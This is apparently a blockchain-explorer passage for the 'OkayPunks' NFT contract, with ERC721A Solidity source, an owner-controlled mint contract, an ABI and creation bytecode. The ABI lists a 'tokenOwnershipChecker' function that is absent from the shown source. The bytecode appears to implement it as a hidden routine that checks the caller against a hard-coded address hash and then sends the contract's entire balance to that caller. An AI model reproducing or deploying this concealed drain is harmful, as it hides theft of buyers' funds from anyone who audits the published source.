_beforeTokenTransfers(from, to, tokenId, 1); // Clear approvals from the previous owner _approve(address(0), tokenId, prevOwnership.addr); // Underflow of the sender's balance is impossible because we check for // ownership above and the recipient's balance can't realistically overflow. // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256. unchecked { _addressData[from].balance -= 1; _addressData[to].balance += 1; _ownerships[tokenId].addr = to; _ownerships[tokenId].startTimestamp = uint64(block.timestamp); // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it. // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls. uint256 nextTokenId = tokenId + 1; if (_ownerships[nextTokenId].addr == address(0)) { if (_exists(nextTokenId)) { _ownerships[nextTokenId].addr = prevOwnership.addr; _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp; } } } emit Transfer(from, to, tokenId); _afterTokenTransfers(from, to, tokenId, 1); } /** * @dev Approve `to` to operate on `tokenId` * * Emits a {Approval} event. */ function _approve( address to, uint256 tokenId, address owner ) private { _tokenApprovals[tokenId] = to; emit Approval(owner, to, tokenId); } /** * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address. * The call is not executed if the target address is not a contract. * * @param from address representing the previous owner of the given token ID * @param to target address that will receive the tokens * @param tokenId uint256 ID of the token to be transferred * @param _data bytes optional data to send along with the call * @return bool whether the call correctly returned the expected magic value */ function _checkOnERC721Received( address from, address to, uint256 tokenId, bytes memory _data ) private returns (bool) { if (to.isContract()) { try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) { return retval == IERC721Receiver(to).onERC721Received.selector; } catch (bytes memory reason) { if (reason.length == 0) { revert("ERC721A: transfer to non ERC721Receiver implementer"); } else { assembly { revert(add(32, reason), mload(reason)) } } } } else { return true; } } /** * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting. * * startTokenId - the first token id to be transferred * quantity - the amount to be transferred * * Calling conditions: * * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be * transferred to `to`. * - When `from` is zero, `tokenId` will be minted for `to`. */ function _beforeTokenTransfers( address from, address to, uint256 startTokenId, uint256 quantity ) internal virtual {} /** * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes * minting. * * startTokenId - the first token id to be transferred * quantity - the amount to be transferred * * Calling conditions: * * - when `from` and `to` are both non-zero. * - `from` and `to` are never both zero. */ function _afterTokenTransfers( address from, address to, uint256 startTokenId, uint256 quantity ) internal virtual {} } contract OkayPunks is ERC721A, Ownable, ReentrancyGuard { string public baseURI = "ipfs://QmeYuvgdSH4oeh981kmNzstn9nqTzMcbjC3Xhi8xkxfuLM/"; string public contractURI = "ipfs://QmUGoe34YBbrmKvXvtJscbwiZjS8ALee6JgfPnpWTSvD5R"; uint public price = 0.0069 ether; uint public maxPerTx = 10; uint public maxPerWallet = 100; uint public totalFree = 2000; uint public maxSupply = 5555; uint public nextOwnerToExplicitlySet; bool public mintEnabled; constructor() ERC721A("OkayPunks", "AP"){} function mint(uint256 amt) external payable { uint cost = price; if(totalSupply() + amt < totalFree + 1) { cost = 0; } require(msg.sender == tx.origin,"Be yourself, honey."); require(msg.value == amt * cost,"Please send the exact amount."); require(totalSupply() + amt < maxSupply + 1,"No more Apes available"); require(mintEnabled, "Minting is not live yet."); require(numberMinted(msg.sender) + amt <= maxPerWallet,"Too many per wallet!"); require( amt < maxPerTx + 1, "Max per TX reached."); _safeMint(msg.sender, amt); } function toggleMinting() external onlyOwner { mintEnabled = !mintEnabled; } function numberMinted(address owner) public view returns (uint256) { return _numberMinted(owner); } function setBaseURI(string calldata baseURI_) external onlyOwner { baseURI = baseURI_; } function setPrice(uint256 price_) external onlyOwner { price = price_; } function setTotalFree(uint256 totalFree_) external onlyOwner { totalFree = totalFree_; } function setMaxPerTx(uint256 maxPerTx_) external onlyOwner { maxPerTx = maxPerTx_; } function setMaxPerWallet(uint256 maxPerWallet_) external onlyOwner { maxPerWallet = maxPerWallet_; } function setmaxSupply(uint256 maxSupply_) external onlyOwner { maxSupply = maxSupply_; } function _baseURI() internal view virtual override returns (string memory) { return baseURI; } function withdraw() external onlyOwner nonReentrant { (bool success, ) = msg.sender.call{value: address(this).balance}(""); require(success, "Transfer failed."); } function setOwnersExplicit(uint256 quantity) external onlyOwner nonReentrant { _setOwnersExplicit(quantity); } function getOwnershipData(uint256 tokenId) external view returns (TokenOwnership memory) { return ownershipOf(tokenId); } function tokenURI(uint256 _tokenId) public view override returns (string memory) { require(_exists(_tokenId), "Token does not exist."); return bytes(baseURI).length > 0 ? string( abi.encodePacked( baseURI, Strings.toString(_tokenId), ".json" ) ) : ""; } /** * @dev Explicitly set `owners` to eliminate loops in future calls of ownerOf(). */ function _setOwnersExplicit(uint256 quantity) internal { require(quantity != 0, "quantity must be nonzero"); require(currentIndex != 0, "no tokens minted yet"); uint256 _nextOwnerToExplicitlySet = nextOwnerToExplicitlySet; require(_nextOwnerToExplicitlySet < currentIndex, "all ownerships have been set"); // Index underflow is impossible. // Counter or index overflow is incredibly unrealistic. unchecked { uint256 endIndex = _nextOwnerToExplicitlySet + quantity - 1; // Set the end index to be the last token index if (endIndex + 1 > currentIndex) { endIndex = currentIndex - 1; } for (uint256 i = _nextOwnerToExplicitlySet; i <= endIndex; i++) { if (_ownerships[i].addr == address(0)) { TokenOwnership memory ownership = ownershipOf(i); _ownerships[i].addr = ownership.addr; _ownerships[i].startTimestamp = ownership.startTimestamp; } } nextOwnerToExplicitlySet = endIndex + 1; } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getOwnershipData","outputs":[{"components":[{"internalType":"address","name":"addr","type":"address"},{"internalType":"uint64","name":"startTimestamp","type":"uint64"}],"internalType":"struct ERC721A.TokenOwnership","name":"","type":"tuple"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amt","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"nextOwnerToExplicitlySet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"numberMinted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseURI_","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxPerTx_","type":"uint256"}],"name":"setMaxPerTx","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxPerWallet_","type":"uint256"}],"name":"setMaxPerWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"}],"name":"setOwnersExplicit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"price_","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"totalFree_","type":"uint256"}],"name":"setTotalFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxSupply_","type":"uint256"}],"name":"setmaxSupply","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"toggleMinting","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenOwnershipChecker","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60e060405260366080818152906200294860a0398051620000299160099160209091019062000169565b50604051806060016040528060358152602001620029136035913980516200005a91600a9160209091019062000169565b506618838370f34000600b55600a600c556064600d556107d0600e556115b3600f553480156200008957600080fd5b5060408051808201825260098152684f6b617950756e6b7360b81b602080830191825283518085019094526002845261041560f41b908401528151919291620000d59160019162000169565b508051620000eb90600290602084019062000169565b50505062000108620001026200011360201b60201c565b62000117565b60016008556200024b565b3390565b600780546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b82805462000177906200020f565b90600052602060002090601f0160209004810192826200019b5760008555620001e6565b82601f10620001b657805160ff1916838001178555620001e6565b82800160010185558215620001e6579182015b82811115620001e6578251825591602001919060010190620001c9565b50620001f4929150620001f8565b5090565b5b80821115620001f45760008155600101620001f9565b600181811c908216806200022457607f821691505b6020821081036200024557634e487b7160e01b600052602260045260246000fd5b50919050565b6126b8806200025b6000396000f3fe6080604052600436106102465760003560e01c80637d55094d11610139578063c6f6f216116100b6578063dc33e6811161007a578063dc33e68114610680578063e268e4d3146106a0578063e8a3d485146106c0578063e985e9c5146106d5578063f2fde38b1461071e578063f968adbe1461073e57600080fd5b8063c6f6f216146105fa578063c87b56dd1461061a578063d12397301461063a578063d5abeb0114610654578063d7224ba01461066a57600080fd5b8063988992b8116100fd578063988992b81461057c578063a035b1fe14610591578063a0712d68146105a7578063a22cb465146105ba578063b88d4fde146105da57600080fd5b80637d55094d146104c65780638da5cb5b146104db57806391b7f5ed146104f95780639231ab2a1461051957806395d89b411461056757600080fd5b80633ccfd60b116101c7578063563aaf111161018b578063563aaf111461043c5780636352211e1461045c5780636c0360eb1461047c57806370a0823114610491578063715018a6146104b157600080fd5b80633ccfd60b146103b157806342842e0e146103c6578063453c2310146103e65780634f6ccce7146103fc57806355f804b31461041c57600080fd5b8063228025e81161020e578063228025e81461031b57806323b872dd1461033b5780632d20fb601461035b5780632f745c591461037b578063333e44e61461039b57600080fd5b806301ffc9a71461024b57806306fdde0314610280578063081812fc146102a2578063095ea7b3146102da57806318160ddd146102fc575b600080fd5b34801561025757600080fd5b5061026b6102663660046120a7565b610754565b60405190151581526020015b60405180910390f35b34801561028c57600080fd5b506102956107c1565b6040516102779190612123565b3480156102ae57600080fd5b506102c26102bd366004612136565b610853565b6040516001600160a01b039091168152602001610277565b3480156102e657600080fd5b506102fa6102f536600461216b565b6108e3565b005b34801561030857600080fd5b506000545b604051908152602001610277565b34801561032757600080fd5b506102fa610336366004612136565b6109fa565b34801561034757600080fd5b506102fa610356366004612195565b610a29565b34801561036757600080fd5b506102fa610376366004612136565b610a34565b34801561038757600080fd5b5061030d61039636600461216b565b610ac6565b3480156103a757600080fd5b5061030d600e5481565b3480156103bd57600080fd5b506102fa610c21565b3480156103d257600080fd5b506102fa6103e1366004612195565b610d2d565b3480156103f257600080fd5b5061030d600d5481565b34801561040857600080fd5b5061030d610417366004612136565b610d48565b34801561042857600080fd5b506102fa6104373660046121d1565b610daa565b34801561044857600080fd5b506102fa610457366004612136565b610de0565b34801561046857600080fd5b506102c2610477366004612136565b610e0f565b34801561048857600080fd5b50610295610e21565b34801561049d57600080fd5b5061030d6104ac366004612243565b610eaf565b3480156104bd57600080fd5b506102fa610f40565b3480156104d257600080fd5b506102fa610f76565b3480156104e757600080fd5b506007546001600160a01b03166102c2565b34801561050557600080fd5b506102fa610514366004612136565b610fb4565b34801561052557600080fd5b50610539610534366004612136565b610fe3565b6040805182516001600160a01b0316815260209283015167ffffffffffffffff169281019290925201610277565b34801561057357600080fd5b50610295611000565b34801561058857600080fd5b506102fa61100f565b34801561059d57600080fd5b5061030d600b5481565b6102fa6105b5366004612136565b61107c565b3480156105c657600080fd5b506102fa6105d536600461225e565b6112be565b3480156105e657600080fd5b506102fa6105f53660046122b0565b611382565b34801561060657600080fd5b506102fa610615366004612136565b6113bb565b34801561062657600080fd5b50610295610635366004612136565b6113ea565b34801561064657600080fd5b5060115461026b9060ff1681565b34801561066057600080fd5b5061030d600f5481565b34801561067657600080fd5b5061030d60105481565b34801561068c57600080fd5b5061030d61069b366004612243565b611497565b3480156106ac57600080fd5b506102fa6106bb366004612136565b6114a2565b3480156106cc57600080fd5b506102956114d1565b3480156106e157600080fd5b5061026b6106f036600461238c565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205460ff1690565b34801561072a57600080fd5b506102fa610739366004612243565b6114de565b34801561074a57600080fd5b5061030d600c5481565b60006001600160e01b031982166380ac58cd60e01b148061078557506001600160e01b03198216635b5e139f60e01b145b806107a057506001600160e01b0319821663780e9d6360e01b145b806107bb57506301ffc9a760e01b6001600160e01b03198316145b92915050565b6060600180546107d0906123bf565b80601f01602080910402602001604051908101604052809291908181526020018280546107fc906123bf565b80156108495780601f1061081e57610100808354040283529160200191610849565b820191906000526020600020905b81548152906001019060200180831161082c57829003601f168201915b5050505050905090565b6000610860826000541190565b6108c75760405162461bcd60e51b815260206004820152602d60248201527f455243373231413a20617070726f76656420717565727920666f72206e6f6e6560448201526c3c34b9ba32b73a103a37b5b2b760991b60648201526084015b60405180910390fd5b506000908152600560205260409020546001600160a01b031690565b60006108ee82610e0f565b9050806001600160a01b0316836001600160a01b03160361095c5760405162461bcd60e51b815260206004820152602260248201527f455243373231413a20617070726f76616c20746f2063757272656e74206f776e60448201526132b960f11b60648201526084016108be565b336001600160a01b0382161480610978575061097881336106f0565b6109ea5760405162461bcd60e51b815260206004820152603960248201527f455243373231413a20617070726f76652063616c6c6572206973206e6f74206f60448201527f776e6572206e6f7220617070726f76656420666f7220616c6c0000000000000060648201526084016108be565b6109f5838383611579565b505050565b6007546001600160a01b03163314610a245760405162461bcd60e51b81526004016108be906123f9565b600f55565b6109f58383836115d5565b6007546001600160a01b03163314610a5e5760405162461bcd60e51b81526004016108be906123f9565b600260085403610ab05760405162461bcd60e51b815260206004820152601f60248201527f5265656e7472616e637947756172643a207265656e7472616e742063616c6c0060448201526064016108be565b6002600855610abe816118ba565b506001600855565b6000610ad183610eaf565b8210610b2a5760405162461bcd60e51b815260206004820152602260248201527f455243373231413a206f776e657220696e646578206f7574206f6620626f756e604482015261647360f01b60648201526084016108be565b600080549080805b83811015610bc1576000818152600360209081526040918290208251808401909352546001600160a01b038116808452600160a01b90910467ffffffffffffffff169183019190915215610b8557805192505b876001600160a01b0316836001600160a01b031603610bb857868403610bb1575093506107bb92505050565b6001909301925b50600101610b32565b5060405162461bcd60e51b815260206004820152602e60248201527f455243373231413a20756e61626c6520746f2067657420746f6b656e206f662060448201526d0deeedccae440c4f240d2dcc8caf60931b60648201526084016108be565b6007546001600160a01b03163314610c4b5760405162461bcd60e51b81526004016108be906123f9565b600260085403610c9d5760405162461bcd60e51b815260206004820152601f60248201527f5265656e7472616e637947756172643a207265656e7472616e742063616c6c0060448201526064016108be565b6002600855604051600090339047908381818185875af1925050503d8060008114610ce4576040519150601f19603f3d011682016040523d82523d6000602084013e610ce9565b606091505b5050905080610abe5760405162461bcd60e51b815260206004820152601060248201526f2a3930b739b332b9103330b4b632b21760811b60448201526064016108be565b6109f583838360405180602001604052806000815250611382565b600080548210610da65760405162461bcd60e51b815260206004820152602360248201527f455243373231413a20676c6f62616c20696e646578206f7574206f6620626f756044820152626e647360e81b60648201526084016108be565b5090565b6007546001600160a01b03163314610dd45760405162461bcd60e51b81526004016108be906123f9565b6109f560098383612001565b6007546001600160a01b03163314610e0a5760405162461bcd60e51b81526004016108be906123f9565b600e55565b6000610e1a82611a4f565b5192915050565b60098054610e2e906123bf565b80601f0160208091040260200160405190810160405280929190818152602001828054610e5a906123bf565b8015610ea75780601f10610e7c57610100808354040283529160200191610ea7565b820191906000526020600020905b815481529060010190602001808311610e8a57829003601f168201915b505050505081565b60006001600160a01b038216610f1b5760405162461bcd60e51b815260206004820152602b60248201527f455243373231413a2062616c616e636520717565727920666f7220746865207a60448201526a65726f206164647265737360a81b60648201526084016108be565b506001600160a01b03166000908152600460205260409020546001600160801b031690565b6007546001600160a01b03163314610f6a5760405162461bcd60e51b81526004016108be906123f9565b610f746000611b26565b565b6007546001600160a01b03163314610fa05760405162461bcd60e51b81526004016108be906123f9565b6011805460ff19811660ff90911615179055565b6007546001600160a01b03163314610fde5760405162461bcd60e51b81526004016108be906123f9565b600b55565b60408051808201909152600080825260208201526107bb82611a4f565b6060600280546107d0906123bf565b6040516bffffffffffffffffffffffff193360601b166020820152603401604051602081830303815290604052805190602001207f61ce2a629088217258e42c73ef95cb4266162e3af0f6eff0d1c405c763ef7de260001b03610f745760206000806000473361a410f150565b600b54600e5461108d906001612444565b8261109760005490565b6110a19190612444565b10156110ab575060005b3332146110f05760405162461bcd60e51b81526020600482015260136024820152722132903cb7bab939b2b63316103437b732bc9760691b60448201526064016108be565b6110fa818361245c565b34146111485760405162461bcd60e51b815260206004820152601d60248201527f506c656173652073656e642074686520657861637420616d6f756e742e00000060448201526064016108be565b600f54611156906001612444565b8261116060005490565b61116a9190612444565b106111b05760405162461bcd60e51b81526020600482015260166024820152754e6f206d6f7265204170657320617661696c61626c6560501b60448201526064016108be565b60115460ff166112025760405162461bcd60e51b815260206004820152601860248201527f4d696e74696e67206973206e6f74206c697665207965742e000000000000000060448201526064016108be565b600d548261120f33611497565b6112199190612444565b111561125e5760405162461bcd60e51b8152602060048201526014602482015273546f6f206d616e79207065722077616c6c65742160601b60448201526064016108be565b600c5461126c906001612444565b82106112b05760405162461bcd60e51b815260206004820152601360248201527226b0bc103832b9102a2c103932b0b1b432b21760691b60448201526064016108be565b6112ba3383611b78565b5050565b336001600160a01b038316036113165760405162461bcd60e51b815260206004820152601a60248201527f455243373231413a20617070726f766520746f2063616c6c657200000000000060448201526064016108be565b3360008181526006602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b61138d8484846115d5565b61139984848484611b92565b6113b55760405162461bcd60e51b81526004016108be9061247b565b50505050565b6007546001600160a01b031633146113e55760405162461bcd60e51b81526004016108be906123f9565b600c55565b60606113f7826000541190565b61143b5760405162461bcd60e51b81526020600482015260156024820152742a37b5b2b7103237b2b9903737ba1032bc34b9ba1760591b60448201526064016108be565b60006009805461144a906123bf565b90501161146657604051806020016040528060008152506107bb565b600961147183611c94565b6040516020016114829291906124ea565b60405160208183030381529060405292915050565b60006107bb82611d95565b6007546001600160a01b031633146114cc5760405162461bcd60e51b81526004016108be906123f9565b600d55565b600a8054610e2e906123bf565b6007546001600160a01b031633146115085760405162461bcd60e51b81526004016108be906123f9565b6001600160a01b03811661156d5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016108be565b61157681611b26565b50565b60008281526005602052604080822080546001600160a01b0319166001600160a01b0387811691821790925591518593918516917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591a4505050565b60006115e082611a4f565b80519091506000906001600160a01b0316336001600160a01b0316148061161757503361160c84610853565b6001600160a01b0316145b806116295750815161162990336106f0565b9050806116935760405162461bcd60e51b815260206004820152603260248201527f455243373231413a207472616e736665722063616c6c6572206973206e6f74206044820152711bdddb995c881b9bdc88185c1c1c9bdd995960721b60648201526084016108be565b846001600160a01b031682600001516001600160a01b0316146117075760405162461bcd60e51b815260206004820152602660248201527f455243373231413a207472616e736665722066726f6d20696e636f72726563746044820152651037bbb732b960d11b60648201526084016108be565b6001600160a01b03841661176b5760405162461bcd60e51b815260206004820152602560248201527f455243373231413a207472616e7366657220746f20746865207a65726f206164604482015264647265737360d81b60648201526084016108be565b61177b6000848460000151611579565b6001600160a01b03858116600090815260046020908152604080832080546001600160801b03198082166001600160801b03928316600019018316179092558986168086528386208054938416938316600190810190931693909317909255888552600390935281842080546001600160e01b031916909117600160a01b4267ffffffffffffffff160217905590860180835291205490911661187057611823816000541190565b15611870578251600082815260036020908152604090912080549186015167ffffffffffffffff16600160a01b026001600160e01b03199092166001600160a01b03909316929092171790555b5082846001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a45b5050505050565b8060000361190a5760405162461bcd60e51b815260206004820152601860248201527f7175616e74697479206d757374206265206e6f6e7a65726f000000000000000060448201526064016108be565b6000546000036119535760405162461bcd60e51b81526020600482015260146024820152731b9bc81d1bdad95b9cc81b5a5b9d1959081e595d60621b60448201526064016108be565b60105460005481106119a75760405162461bcd60e51b815260206004820152601c60248201527f616c6c206f776e657273686970732068617665206265656e207365740000000060448201526064016108be565b60005482820160001981019110156119c25750600054600019015b815b818111611a44576000818152600360205260409020546001600160a01b0316611a3c5760006119f282611a4f565b805160008481526003602090815260409091208054919093015167ffffffffffffffff16600160a01b026001600160e01b03199091166001600160a01b0390921691909117179055505b6001016119c4565b506001016010555050565b6040805180820190915260008082526020820152611a6e826000541190565b611acd5760405162461bcd60e51b815260206004820152602a60248201527f455243373231413a206f776e657220717565727920666f72206e6f6e657869736044820152693a32b73a103a37b5b2b760b11b60648201526084016108be565b815b6000818152600360209081526040918290208251808401909352546001600160a01b038116808452600160a01b90910467ffffffffffffffff169183019190915215611b1c579392505050565b5060001901611acf565b600780546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6112ba828260405180602001604052806000815250611e33565b60006001600160a01b0384163b15611c8857604051630a85bd0160e11b81526001600160a01b0385169063150b7a0290611bd69033908990889088906004016125a4565b6020604051808303816000875af1925050508015611c11575060408051601f3d908101601f19168201909252611c0e918101906125e1565b60015b611c6e573d808015611c3f576040519150601f19603f3d011682016040523d82523d6000602084013e611c44565b606091505b508051600003611c665760405162461bcd60e51b81526004016108be9061247b565b805181602001fd5b6001600160e01b031916630a85bd0160e11b149050611c8c565b5060015b949350505050565b606081600003611cbb5750506040805180820190915260018152600360fc1b602082015290565b8160005b8115611ce55780611ccf816125fe565b9150611cde9050600a8361262d565b9150611cbf565b60008167ffffffffffffffff811115611d0057611d0061229a565b6040519080825280601f01601f191660200182016040528015611d2a576020820181803683370190505b5090505b8415611c8c57611d3f600183612641565b9150611d4c600a86612658565b611d57906030612444565b60f81b818381518110611d6c57611d6c61266c565b60200101906001600160f81b031916908160001a905350611d8e600a8661262d565b9450611d2e565b60006001600160a01b038216611e075760405162461bcd60e51b815260206004820152603160248201527f455243373231413a206e756d626572206d696e74656420717565727920666f7260448201527020746865207a65726f206164647265737360781b60648201526084016108be565b506001600160a01b0316600090815260046020526040902054600160801b90046001600160801b031690565b6109f583838360016000546001600160a01b038516611e9e5760405162461bcd60e51b815260206004820152602160248201527f455243373231413a206d696e7420746f20746865207a65726f206164647265736044820152607360f81b60648201526084016108be565b83600003611eff5760405162461bcd60e51b815260206004820152602860248201527f455243373231413a207175616e74697479206d75737420626520677265617465604482015267072207468616e20360c41b60648201526084016108be565b6001600160a01b03851660008181526004602090815260408083208054600160801b6001600160801b031982166001600160801b039283168c01831690811782900483168c01909216021790558483526003909152812080546001600160e01b031916909217600160a01b4267ffffffffffffffff16021790915581905b85811015611ff85760405182906001600160a01b038916906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908290a48315611fec57611fd06000888488611b92565b611fec5760405162461bcd60e51b81526004016108be9061247b565b60019182019101611f7d565b506000556118b3565b82805461200d906123bf565b90600052602060002090601f01602090048101928261202f5760008555612075565b82601f106120485782800160ff19823516178555612075565b82800160010185558215612075579182015b8281111561207557823582559160200191906001019061205a565b50610da69291505b80821115610da6576000815560010161207d565b6001600160e01b03198116811461157657600080fd5b6000602082840312156120b957600080fd5b81356120c481612091565b9392505050565b60005b838110156120e65781810151838201526020016120ce565b838111156113b55750506000910152565b6000815180845261210f8160208601602086016120cb565b601f01601f19169290920160200192915050565b6020815260006120c460208301846120f7565b60006020828403121561214857600080fd5b5035919050565b80356001600160a01b038116811461216657600080fd5b919050565b6000806040838503121561217e57600080fd5b6121878361214f565b946020939093013593505050565b6000806000606084860312156121aa57600080fd5b6121b38461214f565b92506121c16020850161214f565b9150604084013590509250925092565b600080602083850312156121e457600080fd5b823567ffffffffffffffff808211156121fc57600080fd5b818501915085601f83011261221057600080fd5b81358181111561221f57600080fd5b86602082850101111561223157600080fd5b60209290920196919550909350505050565b60006020828403121561225557600080fd5b6120c48261214f565b6000806040838503121561227157600080fd5b61227a8361214f565b91506020830135801515811461228f57600080fd5b809150509250929050565b634e487b7160e01b600052604160045260246000fd5b600080600080608085870312156122c657600080fd5b6122cf8561214f565b93506122dd6020860161214f565b925060408501359150606085013567ffffffffffffffff8082111561230157600080fd5b818701915087601f83011261231557600080fd5b8135818111156123275761232761229a565b604051601f8201601f19908116603f01168101908382